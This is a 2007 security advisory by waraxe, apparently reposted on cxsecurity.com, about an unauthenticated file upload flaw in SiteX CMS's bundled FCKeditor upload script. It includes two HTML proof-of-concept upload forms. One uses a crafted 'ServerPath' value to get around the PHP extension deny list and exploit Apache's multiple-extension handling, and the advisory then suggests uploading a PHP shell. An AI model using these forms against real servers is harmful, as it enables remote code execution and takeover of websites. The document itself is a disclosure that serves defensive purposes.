Unauthorized File Upload in SiteX CMS

2007.10.01
Credit: waraxe
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

[waraxe-2007-SA#057] - Unauthorized File Upload in SiteX CMS ==================================================================== Author: Janek Vind "waraxe" Date: 27. September 2007 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-57.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://sitex.bjsintay.com/ SiteX is a versitile web tool that will enable you to start your own dynamic website in under 5 minutes. Driven by PHP and MySQL, SiteX consists of components common to most personal and professional websites. Vulnerabilities: file upload possibilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SiteX CMS contains third-party scripts from FCKeditor. One of them is: "includes/fck/editor/filemanager/upload/php/upload.php". This particular script does not have any checks against user validity and anyone can try to upload files to SiteX-powered website. Here is proof-of-concept file for testing: ------------>[proof-of-concept]<----------- <html> <body> <center> <form action="http://localhost/sitex.0.7.3.beta/includes/fck/editor/ filemanager/upload/php/upload.php?ServerPath=/sitex.0.7.3.beta/" enctype="multipart/form-data" method="post"> <input type="file" name="NewFile" size="140"> <input type="submit" value="Test"> </center> </body> </html> ------------>[/proof-of-concept]<----------- Parameter "ServerPath" must be changed as needed. Now, by using this PoC upload file we can upload to victim server any files, except with some predefined (dangerous) extensions. $Config['DeniedExtensions']['File'] = array('php','php2','php3', 'php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm', 'cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi') ; But we really want to upload php scripts to victim webserver ... Well, let's assume, that we have php file "test.waraxe". As we see, file extension is "waraxe" :) Now there is another PoC testfile: ------------>[proof-of-concept]<----------- <html> <body> <center> <form action="http://localhost/sitex.0.7.3.beta/includes/fck/editor/ filemanager/upload/php/upload.php?ServerPath=/sitex.0.7.3.beta/x.php." enctype="multipart/form-data" method="post"> <input type="file" name="NewFile" size="140"> <input type="submit" value="Test"> </center> </body> </html> ------------>[/proof-of-concept]<----------- And when we use this upload form, then we will have file named "x.php.test.waraxe" in target webserver. Does anyone recall "RAR exploit"? Google for "RAR exploit coppermine" and find out, that Apache webserver has interesting feature: if we request file with unknown extension (".waraxe") and if filename contains ".php.", then Apache will try to handle it as php file :) So that we can now upload to webserver any php files and get php scripting level access to target server. Next step can be uploading php shell and escalating attack. //-----> See ya soon and have a nice day ;) <-----// Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and all other people who know me! Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe (at) yahoo (dot) com [email concealed] Janek Vind "waraxe" Homepage: http://www.waraxe.us/ Shameless advertise: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Biology books - http://biology.oldreadings.com/ Sevice Manuals - http://service-manuals.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top